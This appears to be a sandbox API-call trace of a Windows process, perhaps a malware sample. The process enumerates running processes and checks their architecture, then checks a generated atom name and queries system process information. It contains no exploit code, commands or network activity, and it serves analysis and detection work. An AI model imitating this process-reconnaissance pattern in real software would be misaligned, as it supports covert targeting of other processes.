	[0073.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0073.961] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.961] CloseHandle (hObject=0x224) returned 1
	[0073.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7288b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0073.961] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.961] CloseHandle (hObject=0x224) returned 1
	[0073.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0073.961] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.961] CloseHandle (hObject=0x224) returned 1
	[0073.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0073.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0073.962] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.962] CloseHandle (hObject=0x224) returned 1
	[0073.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0073.962] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.962] CloseHandle (hObject=0x224) returned 1
	[0073.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0073.962] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.962] CloseHandle (hObject=0x224) returned 1
	[0073.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0073.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0073.962] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.962] CloseHandle (hObject=0x224) returned 1
	[0073.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0073.963] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.963] CloseHandle (hObject=0x224) returned 1
	[0073.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dbd0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0073.963] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.963] CloseHandle (hObject=0x224) returned 1
	[0073.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728838, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0073.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0073.963] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.963] CloseHandle (hObject=0x224) returned 1
	[0073.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e860, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0073.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0073.963] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.963] CloseHandle (hObject=0x224) returned 1
	[0073.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728a18, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0073.964] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.964] CloseHandle (hObject=0x224) returned 1
	[0073.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0073.964] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.964] CloseHandle (hObject=0x224) returned 1
	[0073.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0073.964] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.964] CloseHandle (hObject=0x224) returned 1
	[0073.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7289f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0073.964] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.964] CloseHandle (hObject=0x224) returned 1
	[0073.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0073.964] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.964] CloseHandle (hObject=0x224) returned 1
	[0073.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0073.965] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.965] CloseHandle (hObject=0x224) returned 1
	[0073.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0073.965] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.965] CloseHandle (hObject=0x224) returned 1
	[0073.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e8d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0073.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0073.965] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.965] CloseHandle (hObject=0x224) returned 1
	[0073.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0073.965] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.965] CloseHandle (hObject=0x224) returned 1
	[0073.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0073.965] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.965] CloseHandle (hObject=0x224) returned 1
	[0073.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0073.966] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.966] CloseHandle (hObject=0x224) returned 1
	[0073.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0073.966] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.966] CloseHandle (hObject=0x224) returned 1
	[0073.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0073.966] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.966] CloseHandle (hObject=0x224) returned 1
	[0073.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e7c0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0073.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0073.966] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.966] CloseHandle (hObject=0x224) returned 1
	[0073.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72eb08, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0073.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.966] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.966] CloseHandle (hObject=0x224) returned 1
	[0073.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.967] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.968] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0073.968] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] GetLastError () returned 0x5
	[0073.968] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.969] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetLastError () returned 0x5
	[0073.970] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.970] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0073.970] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.970] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0073.970] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0073.971] CloseHandle (hObject=0x224) returned 1
	[0073.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0073.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0073.971] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.971] CloseHandle (hObject=0x224) returned 1
	[0073.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e810, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0073.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0073.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0073.971] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.971] CloseHandle (hObject=0x224) returned 1
	[0073.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0074.014] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
